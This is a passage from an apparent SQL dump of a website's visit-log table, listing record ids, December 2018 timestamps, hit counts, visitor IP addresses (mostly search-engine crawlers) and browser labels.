'other'),(356168,1545347690,18,18,0,0,'91.242.162.44','other'),(356169,1545347719,1,1,0,0,'8.29.198.25','other'),(356170,1545347845,1,1,0,0,'95.163.255.173','other'),(356171,1545347848,1,1,0,0,'95.163.255.175','other'),(356172,1545347884,3,3,0,0,'5.45.207.19','other'),(356173,1545347989,2,2,0,0,'207.46.13.102','other'),(356174,1545348034,2,2,0,0,'207.46.13.106','other'),(356175,1545348095,1,1,0,0,'8.29.198.27','other'),(356176,1545348427,2,2,0,0,'87.250.224.47','other'),(356177,1545348597,6,6,0,0,'141.8.142.103','other'),(356178,1545348612,6,6,0,0,'91.242.162.44','other'),(356179,1545348637,3,3,0,0,'95.108.213.4','other'),(356180,1545348650,4,4,0,0,'207.46.13.108','other'),(356181,1545348676,1,1,0,0,'5.45.207.79','other'),(356182,1545348792,2,2,0,0,'91.209.11.236','other'),(356183,1545348813,1,1,0,0,'46.229.168.144','other'),(356184,1545348920,2,2,0,0,'216.244.66.241','other'),(356185,1545348983,2,2,0,0,'5.45.207.19','other'),(356186,1545349253,1,1,0,0,'180.76.15.16','other'),(356187,1545349254,1,1,0,0,'180.76.15.159','other'),(356188,1545349416,2,2,0,0,'207.46.13.106','other'),(356189,1545349934,1,1,0,0,'95.163.255.92','other'),(356190,1545349937,1,1,0,0,'95.163.255.96','other'),(356191,1545349946,2,2,0,0,'95.108.213.4','other'),(356192,1545350020,1,1,0,0,'141.8.142.103','other'),(356193,1545350073,1,1,0,0,'216.244.66.241','other'),(356194,1545350149,9,9,0,0,'91.242.162.44','other'),(356195,1545350182,1,1,0,0,'207.46.13.154','other'),(356196,1545350193,5,5,0,0,'5.45.207.19','other'),(356197,1545350216,3,3,0,0,'178.154.244.11','other'),(356198,1545350326,2,2,0,0,'40.77.167.157','other'),(356199,1545350383,5,5,0,0,'207.46.13.106','other'),(356200,1545350439,1,1,0,0,'5.45.207.79','other'),(356201,1545350569,2,2,0,0,'207.46.13.102','other'),(356202,1545351134,1,1,0,0,'40.77.167.4','other'),(356203,1545351191,10,10,0,0,'91.242.162.44','other'),(356204,1545351193,2,2,0,0,'37.9.113.148','other'),(356205,1545351475,1,1,0,0,'213.180.203.9','other'),(356206,1545351524,1,1,0,0,'95.108.213.4','other'),(356207,1545351560,3,3,0,0,'5.45.207.79','other'),(356208,1545351626,2,2,0,0,'5.45.207.19','other'),(356209,1545351674,1,1,0,0,'141.8.142.103','other'),(356210,1545351896,9,9,0,0,'207.46.13.102','other'),(356211,1545352372,2,2,0,0,'207.46.13.7','other'),(356212,1545352380,1,1,0,0,'46.229.168.129','other'),(356213,1545352527,3,3,0,0,'216.244.66.241','other'),(356214,1545352641,3,3,0,0,'40.77.167.4','other'),(356215,1545352966,1,1,0,0,'178.154.244.11','other'),(356216,1545353658,1,1,0,0,'5.45.207.79','other'),(356217,1545353745,1,1,0,0,'94.102.51.78','other'),(356218,1545353860,1,1,0,0,'216.244.66.241','other'),(356219,1545354154,3,3,0,0,'207.46.13.7','other'),(356220,1545354304,1,1,0,0,'207.46.13.106','other'),(356221,1545354418,2,2,0,0,'46.229.168.134','other'),(356222,1545354419,1,1,0,0,'46.229.168.138','other'),(356223,1545354461,2,2,0,0,'40.77.167.4','other'),(356224,1545354509,1,1,0,0,'207.46.13.116','other'),(356225,1545354538,1,1,0,0,'95.163.255.94','other'),(356226,1545354541,1,1,0,0,'95.163.255.95','other'),(356227,1545354546,1,1,0,0,'66.249.66.152','chrome'),(356228,1545355046,1,1,0,0,'46.229.168.145','other'),(356229,1545355227,2,2,0,0,'216.244.66.241','other'),(356230,1545355633,3,3,0,0,'207.46.13.116','other'),(356231,1545356050,1,1,0,0,'46.229.168.144','other'),(356232,1545356149,4,4,0,0,'207.46.13.118','other'),(356233,1545356649,1,1,0,0,'46.229.168.130','other'),(356234,1545357037,1,1,0,0,'46.229.168.134','other'),(356235,1545357140,1,1,0,0,'95.163.255.94','other'),(356236,1545357189,4,4,0,0,'207.46.13.14','other'),(356237,1545357263,2,2,0,0,'207.46.13.118','other'),(356238,1545357308,2,2,0,0,'207.46.13.116','other'),(356239,1545357933,1,1,0,0,'40.77.167.65','other'),(356240,1545358219,1,1,0,0,'5.188.210.53','chrome'),(356241,1545358541,1,1,0,0,'8.29.198.27','other'),(356242,1545358823,6,6,0,0,'207.46.13.14','other'),(356243,1545359006,3,3,0,0,'216.244.66.241','other'),(356244,1545359123,4,4,0,0,'157.55.39.175','other'),(356245,1545359386,1,1,0,0,'65.19.138.33','other'),(356246,1545359387,1,1,0,0,'8.29.198.25','other'),(356247,1545359792,1,1,0,0,'66.249.66.157','chrome'),(356248,1545359793,1,1,0,0,'66.249.66.156','chrome'),(356249,1545359811,1,1,0,0,'5.58.14.187','other'),(356250,1545360023,2,2,0,0,'207.46.13.118','other'),(356251,1545360048,1,1,0,0,'95.163.255.192','other'),(356252,1545360051,1,1,0,0,'95.163.255.153','other'),(356253,1545360057,2,2,0,0,'95.163.255.95','other'),(356254,1545360116,3,3,0,0,'5.45.207.19','other'),(356255,1545360300,1,1,0,0,'87.250.224.47','other'),(356256,1545360325,3,3,0,0,'5.45.207.79','other'),(356257,1545360348,5,5,0,0,'141.8.142.103','other'),(356258,1545360419,1,1,0,0,'46.229.168.152','other'),(356259,1545360454,1,1,0,0,'46.229.168.143','other'),(356260,1545360795,7,7,0,0,'178.154.244.11','other'),(356261,1545361026,4,4,0,0,'5.45.207.19','other'),(356262,1545361132,1,1,0,0,'95.108.213.4','other'),(356263,1545361133,1,1,0,0,'46.185.121.250','chrome'),(356264,1545361365,3,3,0,0,'141.8.142.103','other'),(356265,1545361716,1,1,0,0,'213.180.203.9','other'),(356266,1545361731,1,1,0,0,'37.9.113.20','other'),(356267,1545361733,3,3,0,0,'178.154.244.11','other'),(356268,1545361814,1,1,0,0,'178.154.244.65','other'),(356269,1545361836,2,2,0,0,'5.45.207.79','other'),(356270,1545361965,3,3,0,0,'216.244.66.241','other'),(356271,1545362011,1,1,0,0,'46.229.168.152','other'),(356272,1545362014,1,1,0,0,'46.229.168.132','other'),(356273,1545362030,2,2,0,0,'87.250.224.47','other'),(356274,1545362057,2,2,0,0,'5.45.207.19','other'),(356275,1545362092,1,1,0,0,'95.108.213.4','other'),(356276,1545362252,1,1,0,0,'5.58.14.187','other'),(356277,1545362258,1,1,0,0,'95.163.255.174','other'),(356278,1545362261,1,1,0,0,'95.163.255.179','other'),(356279,1545362285,10,10,0,0,'207.46.13.116','other'),(356280,1545362465,4,4,0,0,'157.55.39.175','other'),(356281,1545362583,1,1,0,0,'46.229.168.147','other'),(356282,1545362748,2,2,0,0,'178.154.244.11','other'),(356283,1545362780,2,2,0,0,'141.8.142.103','other'),(356284,1545362932,1,1,0,0,'157.55.39.203','other'),(356285,1545362953,1,1,0,0,'157.55.39.171','other'),(356286,1545363044,3,3,0,0,'216.244.66.241','other'),(356287,1545363087,1,1,0,0,'95.108.213.4','other'),(356288,1545363141,3,3,0,0,'207.46.13.118','other'),(356289,1545363147,7,7,0,0,'207.46.13.14','other'),(356290,1545363254,2,2,0,0,'5.45.207.79','other'),(356291,1545363770,2,2,0,0,'157.55.39.175','other'),(356292,1545363856,1,1,0,0,'40.77.167.21','other'),(356293,1545363908,1,1,0,0,'46.229.168.134','other'),(356294,1545364502,1,1,0,0,'66.249.66.61','chrome'),(356295,1545364503,1,1,0,0,'66.249.66.42','chrome'),(356296,1545365129,1,1,0,0,'216.244.66.241','other'),(356297,1545365243,2,2,0,0,'157.55.39.203','other'),(356298,1545365359,3,3,0,0,'40.77.167.10','other'),(356299,1545365457,1,1,0,0,'95.163.255.160','other'),(356300,1545365458,1,1,0,0,'95.163.255.174','other'),(356301,1545365460,1,1,0,0,'95.163.255.164','other'),(356302,1545365463,1,1,0,0,'95.163.255.150','other'),(356303,1545365526,2,2,0,0,'178.154.244.11','other'),(356304,1545365729,3,3,0,0,'207.46.13.14','other'),(356305,1545365977,6,6,0,0,'157.55.39.175','other'),(356306,1545366904,2,2,0,0,'207.46.13.169','other'),(356307,1545367600,2,2,0,0,'216.244.66.241','other'),(356308,1545367748,1,1,0,0,'46.229.168.136','other'),(356309,1545367999,6,6,0,0,'157.55.39.175','other'),(356310,1545368079,1,1,0,0,'5.45.207.79','other'),(356311,1545368135,1,1,0,0,'178.154.244.11','other'),(356312,1545368292,1,1,0,0,'66.249.66.154','chrome'),(356313,1545368335,1,1,0,0,'23.250.111.226','chrome'),(356314,1545368363,1,1,0,0,'141.8.142.103','other'),(356315,1545368384,5,5,0,0,'157.55.39.155','other'),(356316,1545368385,1,1,0,0,'46.229.168.133','other'),(356317,1545368395,1,1,0,0,'66.249.66.152','chrome'),(356318,1545368396,1,1,0,0,'95.163.255.95','other'),(356319,1545368434,1,1,0,0,'46.229.168.145','other'),(356320,1545368586,9,9,0,0,'157.55.39.245','other'),(356321,1545368851,1,1,0,0,'46.229.168.130','other'),(356322,1545369143,3,3,0,0,'157.55.39.175','other'),(356323,1545369156,1,1,0,0,'216.244.66.241','other'),(356324,1545369370,1,1,0,0,'8.29.198.25','other'),(356325,1545369792,10,10,0,0,'207.46.13.14','other'),(356326,1545369964,1,1,0,0,'157.55.39.155','other'),(356327,1545370148,2,2,0,0,'157.55.39.245','other'),(356328,1545370204,4,4,0,0,'141.8.142.103','other'),(356330,1545370210,4,4,0,0,'178.154.244.11','other'),(356331,1545370236,1,1,0,0,'8.29.198.27','other'),(356332,1545370529,2,2,0,0,'157.55.39.175','other'),(356333,1545370846,1,1,0,0,'5.45.207.19','other'),(356334,1545370871,3,3,0,0,'5.45.207.79','other'),(356335,1545370976,2,2,0,0,'207.46.13.0','other'),(356336,1545371131,7,7,0,0,'178.154.244.11','other'),(356337,1545371161,1,1,0,0,'95.163.255.99','other'),(356338,1545371164,1,1,0,0,'95.163.255.94','other'),(356339,1545371200,1,1,0,0,'46.229.168.130','other'),(356340,1545371463,3,3,0,0,'216.244.66.241','other'),(356341,1545371522,2,2,0,0,'35.162.168.45','chrome'),(356342,1545371572,1,1,0,0,'157.55.39.245','other'),(356343,1545372209,4,4,0,0,'178.154.244.11','other'),(356344,1545372221,1,1,0,0,'46.229.168.147','other'),(356345,1545372577,1,1,0,0,'95.163.255.113','other'),(356346,1545372622,1,1,0,0,'95.163.255.118','other'),(356347,1545372814,1,1,0,0,'207.46.13.14','other'),(356348,1545372865,1,1,0,0,'5.45.207.19','other'),(356349,1545372888,2,2,0,0,'5.45.207.79','other'),(356350,1545373064,1,1,0,0,'91.196.178.50','chrome'),(356351,1545373608,1,1,0,0,'66.249.66.156','chrome'),(356352,1545373614,1,1,0,0,'95.163.255.191','other'),(356353,1545373617,1,1,0,0,'95.163.255.177','other'),(356354,1545373886,6,6,0,0,'157.55.39.158','other'),(356355,1545374095,2,2,0,0,'52.53.201.78','chrome'),(356356,1545374336,1,1,0,0,'46.229.168.137','other'),(356357,1545374386,8,8,0,0,'157.55.39.155','other'),(356358,1545374442,1,1,0,0,'66.249.66.152','chrome'),(356359,1545374641,3,3,0,0,'91.196.178.67','chrome'),(356360,1545374753,1,1,0,0,'216.244.66.241','other'),(356361,1545375397,2,2,0,0,'157.55.39.175','other'),(356362,1545375522,1,1,0,0,'66.249.66.44','chrome'),(356363,1545375583,3,3,0,0,'157.55.39.158','other'),(356364,1545375697,15,15,0,0,'136.243.151.90','other'),(356365,1545376011,3,3,0,0,'207.46.13.93','other'),(356366,1545376314,4,4,0,0,'207.46.13.0','other'),(356367,1545376598,13,13,0,0,'136.243.151.90','other'),(356368,1545376667,2,2,0,0,'157.55.39.158','other'),(356369,1545376869,1,1,0,0,'66.249.66.154','chrome'),(356370,1545376945,1,1,0,0,'66.249.66.156','chrome'),(356372,1545376960,1,1,0,0,'46.229.168.134','other'),(356373,1545377058,2,2,0,0,'91.196.178.67','chrome'),(356374,1545377106,1,1,0,0,'216.244.66.241','other'),(356375,1545377270,1,1,0,0,'66.249.66.152','chrome'),(356376,1545377432,1,1,0,0,'46.229.168.141','other'),(356377,1545377504,14,14,0,0,'136.243.151.90','other'),(356378,1545377587,1,1,0,0,'95.163.255.99','other'),(356379,1545377590,1,1,0,0,'95.163.255.95','other'),(356380,1545377597,1,1,0,0,'46.229.168.153','other'),(356381,1545377677,1,1,0,0,'104.155.179.226','other'),(356382,1545377933,1,1,0,0,'66.249.66.222','chrome'),(356383,1545377994,2,2,0,0,'207.46.13.93','other'),(356384,1545378002,1,1,0,0,'46.229.168.146','other'),(356385,1545378124,1,1,0,0,'216.244.66.241','other'),(356386,1545378223,1,1,0,0,'176.193.120.23','msie'),(356387,1545378227,1,1,0,0,'46.229.168.132','other'),(356388,1545378400,2,2,0,0,'207.46.13.0','other'),(356389,1545378409,11,11,0,0,'136.243.151.90','other'),(356390,1545379136,1,1,0,0,'207.46.13.191','other'),(356391,1545379207,1,1,0,0,'66.249.66.40','chrome'),(356392,1545379313,6,6,0,0,'136.243.151.90','other'),(356393,1545379430,2,2,0,0,'91.196.178.67','chrome'),(356394,1545379783,4,4,0,0,'207.46.13.0','other'),(356395,1545379822,2,2,0,0,'157.55.13.64','other'),(356396,1545379830,1,1,0,0,'95.132.49.159','chrome'),(356397,1545379845,1,1,0,0,'66.249.66.154','chrome'),(356398,1545379849,1,1,0,0,'31.129.232.242','chrome'),(356399,1545380005,2,2,0,0,'207.46.13.93','other'),(356400,1545380195,1,1,0,0,'46.229.168.151','other'),(356401,1545380206,1,1,0,0,'8.29.198.27','other'),(356402,1545380543,1,1,0,0,'46.229.168.141','other'),(356403,1545380805,1,1,0,0,'13.66.139.0','other'),(356404,1545380844,2,2,0,0,'178.154.244.11','other'),(356405,1545380932,2,2,0,0,'207.46.13.93','other'),(356406,1545381076,1,1,0,0,'8.29.198.26','other'),(356407,1545381222,1,1,0,0,'46.229.168.136','other'),(356408,1545381224,1,1,0,0,'46.229.168.132','other'),(356409,1545381361,2,2,0,0,'207.46.13.0','other'),(356410,1545381410,3,3,0,0,'207.46.13.147','other'),(356411,1545381452,1,1,0,0,'216.244.66.241','other'),(356412,1545381588,2,2,0,0,'207.46.13.191','other'),(356413,1545381741,2,2,0,0,'91.196.178.90','chrome'),(356414,1545381802,1,1,0,0,'66.249.66.61','chrome'),(356416,1545381838,1,1,0,0,'66.249.66.201','chrome'),(356417,1545382109,1,1,0,0,'31.202.23.21','chrome'),(356418,1545382229,2,2,0,0,'66.249.66.44','chrome'),(356419,1545382260,1,1,0,0,'46.229.168.139','other'),(356420,1545382299,2,2,0,0,'66.249.66.155','chrome'),(356421,1545382300,2,2,0,0,'66.249.66.156','chrome'),(356422,1545382512,2,2,0,0,'91.196.178.67','chrome'),(356423,1545382522,1,1,0,0,'66.249.66.154','chrome'),(356424,1545382559,1,1,0,0,'195.34.204.156','chrome'),(356425,1545382655,1,1,0,0,'5.45.207.79','other'),(356426,1545382716,2,2,0,0,'91.209.11.236','other'),(356427,1545382740,1,1,0,0,'66.249.66.157','chrome'),(356428,1545382824,1,1,0,0,'66.249.66.152','chrome'),(356429,1545382832,1,1,0,0,'178.95.246.220','chrome'),(356430,1545383114,1,1,0,0,'46.229.168.133','other'),(356431,1545383145,1,1,0,0,'193.34.95.42','firefox'),(356432,1545383338,1,1,0,0,'46.229.168.145','other'),(356433,1545383752,1,1,0,0,'178.95.246.220','chrome'),(356434,1545383779,3,3,0,0,'82.207.113.7','chrome'),(356435,1545383862,1,1,0,0,'46.229.168.132','other'),(356436,1545384025,3,3,0,0,'66.249.66.154','chrome'),(356437,1545384162,1,1,0,0,'66.249.66.157','chrome'),(356438,1545384184,2,2,0,0,'207.46.13.147','other'),(356439,1545384358,1,1,0,0,'91.196.179.138','chrome'),(356440,1545384529,2,2,0,0,'216.244.66.241','other'),(356441,1545384585,1,1,0,0,'46.229.168.146','other'),(356442,1545384586,1,1,0,0,'46.229.168.153','other'),(356443,1545384796,1,1,0,0,'207.46.13.0','other'),(356444,1545384821,1,1,0,0,'66.249.66.156','chrome'),(356445,1545384884,1,1,0,0,'66.249.66.42','chrome'),(356446,1545385173,3,3,0,0,'40.77.167.173','other'),(356447,1545385222,2,2,0,0,'66.249.66.44','chrome'),(356448,1545385269,9,9,0,0,'157.55.39.158','other'),(356449,1545385287,1,1,0,0,'5.45.207.79','other'),(356450,1545385429,7,7,0,0,'207.46.13.93','other'),(356451,1545385549,2,2,0,0,'82.207.113.7','chrome'),(356452,1545385592,2,2,0,0,'207.46.13.147','other'),(356453,1545385603,2,2,0,0,'40.77.167.26','other'),(356454,1545385871,1,1,0,0,'66.249.66.40','chrome'),(356455,1545386315,8,8,0,0,'207.46.13.0','other'),(356456,1545386529,2,2,0,0,'40.77.167.173','other'),(356457,1545386686,1,1,0,0,'66.249.66.152','chrome'),(356458,1545386689,4,4,0,0,'40.77.167.26','other'),(356459,1545386868,1,1,0,0,'141.8.142.103','other'),(356460,1545386919,4,4,0,0,'216.244.66.241','other'),(356461,1545386960,21,21,0,0,'207.46.13.191','other'),(356462,1545387152,1,1,0,0,'5.45.207.19','other'),(356463,1545387253,1,1,0,0,'66.249.66.218','chrome'),(356464,1545387543,1,1,0,0,'37.112.23.18','chrome'),(356465,1545387708,1,1,0,0,'66.249.66.220','chrome'),(356466,1545387743,3,3,0,0,'66.249.66.42','chrome'),(356467,1545387798,1,1,0,0,'66.249.66.40','chrome'),(356468,1545387901,1,1,0,0,'141.8.142.103','other'),(356469,1545388246,2,2,0,0,'40.77.167.26','other'),(356470,1545388252,1,1,0,0,'46.229.168.147','other'),(356471,1545388402,1,1,0,0,'66.249.66.156','chrome'),(356472,1545389072,1,1,0,0,'66.249.66.152','chrome'),(356473,1545389296,1,1,0,0,'216.244.66.241','other'),(356474,1545389563,3,3,0,0,'66.249.66.156','chrome'),(356475,1545389765,1,1,0,0,'176.105.223.114','chrome'),(356476,1545390228,3,3,0,0,'66.249.66.155','chrome'),(356477,1545390229,2,2,0,0,'66.249.66.154','chrome'),(356478,1545390465,2,2,0,0,'216.244.66.241','other'),(356479,1545390509,1,1,0,0,'46.229.168.132','other'),(356480,1545390511,1,1,0,0,'185.84.148.4','firefox'),(356481,1545390610,2,2,0,0,'91.196.178.130','firefox'),(356482,1545390725,1,1,0,0,'87.250.224.47','other'),(356483,1545390821,1,1,0,0,'66.249.66.222','chrome'),(356484,1545390875,1,1,0,0,'207.46.13.217','other'),(356485,1545391037,1,1,0,0,'8.29.198.25','other'),(356486,1545391212,2,2,0,0,'141.8.142.103','other'),(356487,1545391216,2,2,0,0,'178.154.244.11','other'),(356488,1545391219,4,4,0,0,'5.45.207.19','other'),(356489,1545391256,1,1,0,0,'66.249.66.156','chrome'),(356490,1545391367,1,1,0,0,'46.229.168.143','other'),(356491,1545391914,1,1,0,0,'8.29.198.27','other'),(356492,1545392268,3,3,0,0,'91.196.178.165','chrome'),(356493,1545392335,1,1,0,0,'5.45.207.19','other'),(356494,1545392420,4,4,0,0,'178.154.244.11','other'),(356495,1545392447,1,1,0,0,'46.229.168.133','other'),(356496,1545392449,1,1,0,0,'46.229.168.134','other'),(356497,1545392523,1,1,0,0,'46.211.128.23','chrome'),(356498,1545392693,3,3,0,0,'141.8.142.103','other'),(356499,1545393079,1,1,0,0,'40.77.167.26','other'),(356500,1545393339,2,2,0,0,'66.249.66.40','chrome'),(356501,1545393621,3,3,0,0,'216.244.66.241','other'),(356502,1545393634,1,1,0,0,'46.229.168.141','other'),(356503,1545393659,3,3,0,0,'66.249.66.152','chrome'),(356504,1545393866,1,1,0,0,'66.249.66.157','chrome'),(356505,1545394280,1,1,0,0,'207.46.13.217','other'),(356506,1545394545,2,2,0,0,'66.249.66.40','chrome'),(356507,1545394717,2,2,0,0,'91.196.178.67','chrome'),(356508,1545394926,2,2,0,0,'66.249.66.152','chrome'),(356509,1545395012,1,1,0,0,'66.249.66.155','chrome'),(356511,1545395126,1,1,0,0,'66.249.66.44','chrome'),(356512,1545395348,2,2,0,0,'216.244.66.241','other'),(356513,1545395403,2,2,0,0,'91.196.178.132','firefox'),(356514,1545395562,3,3,0,0,'66.249.66.156','chrome'),(356515,1545395706,5,5,0,0,'91.124.182.170','firefox'),(356516,1545395949,5,5,0,0,'91.196.178.67','chrome'),(356517,1545396264,2,2,0,0,'66.249.66.154','chrome'),(356518,1545396583,1,1,0,0,'5.45.207.79','other'),(356519,1545396616,1,1,0,0,'216.244.66.241','other'),(356520,1545396832,1,1,0,0,'46.185.60.135','firefox'),(356521,1545397192,1,1,0,0,'66.249.66.57','chrome'),(356522,1545397193,1,1,0,0,'66.249.66.44','chrome'),(356523,1545397321,1,1,0,0,'66.249.66.42','chrome'),(356524,1545397396,1,1,0,0,'66.249.66.156','chrome'),(356525,1545397473,1,1,0,0,'46.229.168.145','other'),(356526,1545397474,1,1,0,0,'46.229.168.130','other'),(356527,1545397616,2,2,0,0,'91.124.182.170','firefox'),(356528,1545397707,1,1,0,0,'46.229.168.139','other'),(356529,1545397960,1,1,0,0,'66.249.66.59','chrome'),(356530,1545398232,1,1,0,0,'178.154.244.11','other'),(356531,1545398621,1,1,0,0,'66.249.66.44','chrome'),(356532,1545398632,1,1,0,0,'66.249.66.201','chrome'),(356533,1545399087,2,2,0,0,'66.249.66.155','chrome'),(356534,1545399088,1,1,0,0,'66.249.66.152','chrome'),(356535,1545399471,1,1,0,0,'54.208.102.37','other'),(356536,1545399504,1,1,0,0,'46.229.168.137','other'),(356537,1545399597,1,1,0,0,'66.249.66.156','chrome'),(356538,1545399598,1,1,0,0,'66.249.66.220','chrome'),(356539,1545399618,1,1,0,0,'66.249.66.154','chrome'),(356540,1545399629,1,1,0,0,'66.249.66.61','chrome'),(356541,1545399630,1,1,0,0,'66.249.66.44','chrome'),(356542,1545399682,2,2,0,0,'77.111.247.63','chrome'),(356543,1545399865,2,2,0,0,'216.244.66.241','other'),(356544,1545400294,1,1,0,0,'40.77.167.172','other'),(356545,1545400533,2,2,0,0,'5.45.207.19','other'),(356546,1545400836,2,2,0,0,'93.170.118.121','chrome'),(356547,1545400895,2,2,0,0,'92.113.28.111','chrome'),(356548,1545401442,1,1,0,0,'37.53.125.42','other'),(356549,1545401613,4,4,0,0,'178.154.244.11','other'),(356550,1545401672,3,3,0,0,'5.45.207.19','other'),(356551,1545401682,2,2,0,0,'5.45.207.79','other'),(356552,1545401872,1,1,0,0,'8.29.198.26','other'),(356553,1545402321,2,2,0,0,'66.249.66.152','chrome'),(356554,1545402332,2,2,0,0,'207.46.13.28','other'),(356555,1545402341,1,1,0,0,'207.46.13.163','other'),(356556,1545402582,2,2,0,0,'5.45.207.19','other'),(356557,1545402750,1,1,0,0,'207.46.13.106','other'),(356558,1545402751,3,3,0,0,'178.154.244.11','other'),(356559,1545402770,1,1,0,0,'8.29.198.25','other'),(356560,1545403135,1,1,0,0,'37.53.125.42','other'),(356561,1545403283,1,1,0,0,'91.196.178.186','chrome'),(356562,1545403317,1,1,0,0,'157.55.39.83','other'),(356563,1545403617,1,1,0,0,'66.249.66.152','chrome'),(356564,1545403956,1,1,0,0,'178.154.244.11','other'),(356565,1545403966,1,1,0,0,'5.45.207.79','other'),(356566,1545404636,1,1,0,0,'141.8.142.103','other'),(356567,1545404845,1,1,0,0,'40.77.167.26','other'),(356568,1545405110,1,1,0,0,'5.45.207.79','other'),(356569,1545405912,1,1,0,0,'91.196.178.176','chrome'),(356570,1545406106,1,1,0,0,'87.250.224.47','other'),(356571,1545406252,1,1,0,0,'5.45.207.19','other'),(356572,1545406434,1,1,0,0,'66.249.66.156','chrome'),(356573,1545406749,2,2,0,0,'141.8.142.103','other'),(356574,1545406991,1,1,0,0,'66.249.66.42','chrome'),(356575,1545407129,2,2,0,0,'66.249.66.154','chrome'),(356576,1545407174,1,1,0,0,'178.154.244.11','other'),(356577,1545407331,1,1,0,0,'66.249.66.152','chrome'),(356578,1545407632,1,1,0,0,'207.46.13.163','other'),(356579,1545407735,1,1,0,0,'46.229.168.145','other'),(356580,1545407832,1,1,0,0,'216.244.66.241','other'),(356581,1545407925,1,1,0,0,'209.17.96.18','other'),(356582,1545408044,1,1,0,0,'40.77.167.26','other'),(356583,1545408201,2,2,0,0,'5.45.207.19','other'),(356584,1545408359,1,1,0,0,'178.154.244.11','other'),(356585,1545408472,1,1,0,0,'141.8.142.103','other'),(356586,1545408840,2,2,0,0,'66.249.66.156','chrome'),(356587,1545408909,1,1,0,0,'66.249.66.154','chrome'),(356588,1545408966,2,2,0,0,'216.244.66.241','other'),(356589,1545409380,1,1,0,0,'180.76.15.137','other'),(356590,1545409382,1,1,0,0,'180.76.15.134','other'),(356591,1545409969,1,1,0,0,'46.229.168.140','other'),(356592,1545410063,1,1,0,0,'66.249.66.156','chrome'),(356593,1545410791,2,2,0,0,'66.249.66.152','chrome'),(356594,1545411191,1,1,0,0,'66.249.66.156','chrome'),(356595,1545411366,1,1,0,0,'207.46.13.28','other'),(356596,1545411544,2,2,0,0,'46.211.114.23','chrome'),(356597,1545411838,1,1,0,0,'5.188.210.53','chrome'),(356598,1545412139,2,2,0,0,'216.244.66.241','other'),(356599,1545412175,1,1,0,0,'95.108.213.4','other'),(356600,1545412365,3,3,0,0,'178.154.244.11','other'),(356601,1545412400,2,2,0,0,'141.8.142.103','other'),(356602,1545412534,1,1,0,0,'37.9.113.148','other'),(356603,1545412588,1,1,0,0,'46.229.168.141','other'),(356604,1545412632,1,1,0,0,'66.249.66.152','chrome'),(356605,1545412642,1,1,0,0,'5.45.207.19','other'),(356606,1545412644,1,1,0,0,'141.8.142.65','other'),(356607,1545412691,2,2,0,0,'5.45.207.79','other'),(356608,1545412702,1,1,0,0,'8.29.198.27','other'),(356609,1545412839,1,1,0,0,'46.166.190.148','other'),(356610,1545413365,1,1,0,0,'207.46.13.147','other'),(356611,1545413477,3,3,0,0,'178.154.244.11','other'),(356612,1545413484,1,1,0,0,'95.108.213.4','other'),(356613,1545413627,1,1,0,0,'8.29.198.27','other'),(356614,1545413761,3,3,0,0,'5.45.207.79','other'),(356615,1545413803,1,1,0,0,'46.229.168.150','other'),(356616,1545413985,1,1,0,0,'37.9.113.148','other'),(356617,1545414018,1,1,0,0,'46.200.3.93','chrome'),(356618,1545414042,1,1,0,0,'66.102.9.35','chrome'),(356620,1545414059,2,2,0,0,'216.244.66.241','other'),(356621,1545414372,2,2,0,0,'66.249.66.152','chrome'),(356622,1545414748,1,1,0,0,'66.249.66.155','chrome'),(356623,1545414758,1,1,0,0,'93.175.236.51','chrome'),(356624,1545414759,1,1,0,0,'66.102.9.25','chrome'),(356625,1545414760,1,1,0,0,'66.102.9.24','chrome'),(356626,1545414762,3,3,0,0,'66.249.66.154','chrome'),(356627,1545414807,4,4,0,0,'66.249.66.156','chrome'),(356628,1545414867,1,1,0,0,'46.229.168.153','other'),(356629,1545414868,1,1,0,0,'46.229.168.146','other'),(356630,1545414944,1,1,0,0,'66.249.66.44','chrome'),(356631,1545414976,4,4,0,0,'216.244.66.241','other'),(356632,1545415114,1,1,0,0,'46.229.168.141','other'),(356633,1545416359,1,1,0,0,'207.46.13.28','other'),(356634,1545416650,5,5,0,0,'157.55.39.181','other'),(356635,1545416833,1,1,0,0,'46.229.168.129','other'),(356636,1545417515,1,1,0,0,'66.249.66.42','chrome'),(356637,1545417522,1,1,0,0,'46.229.168.137','other'),(356638,1545417621,1,1,0,0,'157.55.39.181','other'),(356639,1545417712,1,1,0,0,'66.249.66.154','chrome'),(356640,1545417865,1,1,0,0,'141.8.142.103','other'),(356641,1545418610,2,2,0,0,'66.249.66.152','chrome'),(356642,1545418737,1,1,0,0,'31.184.238.56','chrome'),(356643,1545418794,2,2,0,0,'66.249.66.156','chrome'),(356644,1545418994,3,3,0,0,'66.249.66.154','chrome'),(356645,1545419010,2,2,0,0,'66.249.66.42','chrome'),(356646,1545419295,1,1,0,0,'46.211.43.116','chrome'),(356647,1545419565,2,2,0,0,'46.211.123.31','chrome'),(356648,1545419974,1,1,0,0,'5.58.3.75','other'),(356649,1545419986,1,1,0,0,'178.154.244.11','other'),(356650,1545420065,1,1,0,0,'40.77.167.111','other'),(356651,1545420206,1,1,0,0,'213.180.203.17','other'),(356652,1545420362,1,1,0,0,'216.244.66.241','other'),(356653,1545420367,1,1,0,0,'66.249.66.44','chrome'),(356654,1545420679,2,2,0,0,'66.249.66.154','chrome'),(356655,1545421190,1,1,0,0,'82.145.209.117','other'),(356656,1545421222,4,4,0,0,'46.211.123.31','chrome'),(356657,1545421409,2,2,0,0,'66.249.66.156','chrome'),(356658,1545421711,4,4,0,0,'216.244.66.241','other'),(356659,1545421723,2,2,0,0,'91.196.178.56','chrome'),(356660,1545422190,2,2,0,0,'66.249.66.152','chrome'),(356661,1545422353,1,1,0,0,'66.249.66.154','chrome'),(356662,1545422920,1,1,0,0,'207.46.13.61','other'),(356663,1545422957,1,1,0,0,'46.229.168.150','other'),(356664,1545423272,1,1,0,0,'66.249.66.154','chrome'),(356665,1545423391,1,1,0,0,'40.77.167.82','other'),(356666,1545423445,1,1,0,0,'66.249.66.57','chrome'),(356667,1545423446,1,1,0,0,'66.249.66.42','chrome'),(356668,1545423471,1,1,0,0,'95.108.213.4','other'),(356669,1545423529,1,1,0,0,'8.29.198.25','other'),(356670,1545423607,2,2,0,0,'91.196.178.173','chrome'),(356671,1545423641,1,1,0,0,'5.45.207.19','other'),(356672,1545423891,1,1,0,0,'95.163.255.65','other'),(356673,1545423893,1,1,0,0,'95.163.255.63','other'),(356674,1545423999,2,2,0,0,'66.249.66.156','chrome'),(356675,1545424133,1,1,0,0,'66.249.66.152','chrome'),(356676,1545424342,1,1,0,0,'141.8.142.108','other'),(356677,1545424383,2,2,0,0,'66.249.66.40','chrome'),(356678,1545424439,1,1,0,0,'178.154.244.65','other'),(356679,1545424479,1,1,0,0,'8.2